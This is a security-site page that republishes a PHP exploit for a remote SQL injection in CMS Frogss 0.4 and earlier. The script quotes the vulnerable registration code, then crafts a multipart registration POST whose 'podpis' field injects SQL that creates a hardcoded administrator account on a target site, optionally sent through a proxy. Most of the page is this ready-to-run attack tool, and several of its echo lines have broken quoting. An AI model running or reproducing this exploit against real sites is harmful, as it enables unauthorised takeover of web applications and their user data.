首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CMS Frogss <= 0.4 (podpis) Remote SQL Injection Exploit
来源:http://www.rahim.webd.pl 作者:Kacper 发布时间:2006-08-28  

<?php
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~";
echo "+\r\n";
echo "- - - [DEVIL TEAM THE BEST POLISH TEAM] - -\r\n\r\n";
echo "+\r\n";
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\r\n";
echo "+\r\n\r\n";
echo "- CMS frogss <= 0.4 (podpis) SQL Injection Exploit [creat new admin]"\r\n";
echo "+"\r\n";
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"\r\n";
echo "+"\r\n";
echo "- [Script name: CMS frogss v.0.4"\r\n";
echo "- [Script site: http://frogss.be/download.php?id=1"\r\n";
echo "+"\r\n";
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"\r\n";
echo "+"\r\n";
echo "- Find by: Kacper (a.k.a Rahim)"\r\n";
echo "+"\r\n";
echo "- Contact: kacper1964@yahoo.pl"\r\n";
echo "- or"\r\n";
echo "- http://www.rahim.webd.pl/"\r\n";
echo "+"\r\n";
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\r\n";
echo "+"\r\n";
echo "- Special Greetz: DragonHeart ;-)"\r\n";
echo "- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi, nukedclx, mivus ;]"\r\n";
echo "+"\r\n";
echo "!@ Przyjazni nie da sie zamienic na marne korzysci @!"\r\n";
echo "+"\r\n";
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\r\n";
echo "+"\r\n";
echo "- Z Dedykacja dla osoby,"\r\n";
echo "- bez ktorej nie mogl bym zyc..."\r\n";
echo "- K.C:* J.M (a.k.a Magaja)"\r\n";
echo "+"\r\n";
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\r\n";
echo "+"\r\n";
echo "Usage: www.site.com /path/ UserName Password proxy "\r\n";
echo "ex: www.site.com <= site host "\r\n";
echo "ex: /path/ <= script path "\r\n";
echo "ex: Username <= exploit username "\r\n";
echo "ex: Password <= exploit password "\r\n";
echo "ex: proxy <= optional ;-) "\r\n";
echo "+"\r\n";
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\r\n";
echo "EX: www.site.com /frogss/ Evil hacker 127.0.0.1 "\r\n";
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\"\r\n";

/*
vulnerable code => module/rejestracja.php line 56-87:
....
function ok()
{
global $login,$haslo,$email,$miasto,$www,$gg,$tlen,$poziom,$podpis,$last_log,$logowan,$komentarzy,$odwiedzin,$ip,$lan;
$query=mysql_query("SELECT login FROM uzytkownicy WHERE login='".$login."'");
if (!$login) {

echo 'Nie poda³e¶ Loginu';
} elseif (!$haslo){
echo 'Nie poda³e¶ has³a';
} elseif (!$email)
{
echo 'Nie poda³e¶ e-maila';
} elseif(mysql_num_rows($query)==0)
{
if($www=='http://') $www = '';
if($gg=='gg:') $gg = '';
if($tlen=='tlen:') $tlen = '';
$haslomd5 = md5($haslo);
$ip = $_SERVER['REMOTE_ADDR'];
$query1 = "INSERT INTO uzytkownicy VALUES(NOT NULL, '$login', '$haslomd5', '$email', '$miasto', '$www', '$gg', '$tlen', '$poziom', '$podpis', NOW(), '$last_log', '$logowan', '$komentarzy', '$odwiedzin', 'offline', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '0', '0', '0', '$ip')";
$result = mysql_query ($query1);
if($result)
{
echo '<br>'.$lan['registration_add'].'<br>';
}
else
{
echo '<br>'.$lan['registration_add_error'].'<br><br>';
}
}
else
{
....
when we register to new user in $podpis we can insert in SQL injection ;-)

*/


error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
ob_implicit_flush (1);
function show($headeri)
{
$ii=0;$ji=0;$ki=0;$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1){
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td>  </td>";
for ($li=0; $li<=15; $li++) {
echo "<td>".htmlentities($headeri[$li+$ki])."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {
echo "<td>0".htmlentities($datai)."</td>";
}
else {
echo "<td>".htmlentities($datai)."</td> ";
}
$ii++;$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) {
echo "<td>  </td>";
}
for ($li=$ci*16; $li<=strlen($headeri); $li++) {
echo "<td>".htmlentities($headeri[$li])."</td>";
}
echo "</tr></table>";
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacket()
{
global $proxy, $host, $port, $packet, $html, $proxy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid proxy...';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$port."...<br>";
if ($proxy=='') {
$result = socket_connect($socket, $host, $port);
}
else {
$parts =explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else {
echo "OK.<br><br>";
$html= '';
socket_write($socket, $packet, strlen($packet));
echo "Reading response:<br>";
while ($out= socket_read($socket, 2048)) {$html.=$out;}
echo nl2br(htmlentities($html));
echo "Closing socket...";
socket_close($socket);
}
}
}

function refresh()
{
flush();
ob_flush();
usleep(5000000000);
}

function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.htmlentities($host); die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid prozy...';die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);echo nl2br(htmlentities($html));
}

function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}

$host=$_POST[host];$port=$_POST[port];$path=$_POST[path];
$USER=$_POST[USER];$PASS=$_POST[PASS];$proxy=$_POST[proxy];

echo "<span class=\"Stile5\">";

if (($host<>'') and ($path<>''))
{
$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('Error... check the path!');}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

}
if (($host<>'') and ($path<>'') and ($USER<>'') and ($PASS<>''))
{

$sql="') INSERT INTO uzytkownicy VALUES(1, Kacper, b98092e78aa47e68ae2ba617137960a4, devilteam@hackers.pl, NULL, http://www.rahim.webd.pl/, NULL, NULL, 0, DEVILTEAM, NOW(), 99999, 99999, 99999, 9999, offline, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, 0, 4)/*";
$data='-----------------------------7d62702f250530
Content-Disposition: form-data; name="login";

'.$USER.'
-----------------------------7d62702f250530
Content-Disposition: form-data; name="haslo";

'.$PASS.'
-----------------------------7d62702f250530
Content-Disposition: form-data; name="email";

devilteam@polish-hackers.pl
-----------------------------7d62702f250530
Content-Disposition: form-data; name="miasto";

localhost
-----------------------------7d62702f250530
Content-Disposition: form-data; name="www";

http://www.rahim.webd.pl/
-----------------------------7d62702f250530
Content-Disposition: form-data; name="gg";

000000
-----------------------------7d62702f250530
Content-Disposition: form-data; name="tlen";

h20
-----------------------------7d62702f250530--
Content-Disposition: form-data; name="podpis";

'.$sql.'
-----------------------------7d62702f250530--
Content-Disposition: form-data; name="Dodaj";

Dodaj
-----------------------------7d62702f250530--
';

$packet ="POST ".$p."login.php HTTP/1.1\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Referer: http://".$host.$path."index.php?lang=en\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.=$data;
$packet.="Connection: Close\r\n";
show($packet);
sendpacketii($packet);
if (!eregi("Location:",$html)) {die("Failed to login...");}
$temp=explode("Set-Cookie: ",$html);
$COOKIE='';
for ($i=1; $i<=6; $i++)
{
$temp2=explode(" ",$temp[$i]);
$COOKIE.=" ".$temp2[0];
}
if (eregi("The user has successfully been added",$html))
{
echo "exploit succeeded... now login as admin\n";
echo "with username \"Kacper"\" and password \"devilteam"\"\n";
echo ".$host."/Administracja/index.php\"\n";
echo "Greetz ;-)"\n";
}
?>



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·Yahoo! Messenger Webcam 8.1 Ac
·VideoScript 3.0 <= 4.0.1.50 Of
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·iziContents <= RC6 GLOBALS[
·VMware 5.5.1 (ActiveX) Local B
·AlberT-EasySite <= 1.0a5 (P
·MS Windows NetpIsRemote() Remo
·MDaemon POP3 Server < 9.06
·e107 <= 0.75 (GLOBALS Overw
·VistaBB <= 2.x (functions_m
·phpGroupWare <= 0.9.16.010
·Integramod Portal <= 2.x (f
·Streamripper <= 1.61.25 HTT
·phpBB All Topics Mod <= 1.5
·IBM eGatherer <= 3.20.0284.
  推荐广告
CopyRight © 2002-2021 VFocuS.Net All Rights Reserved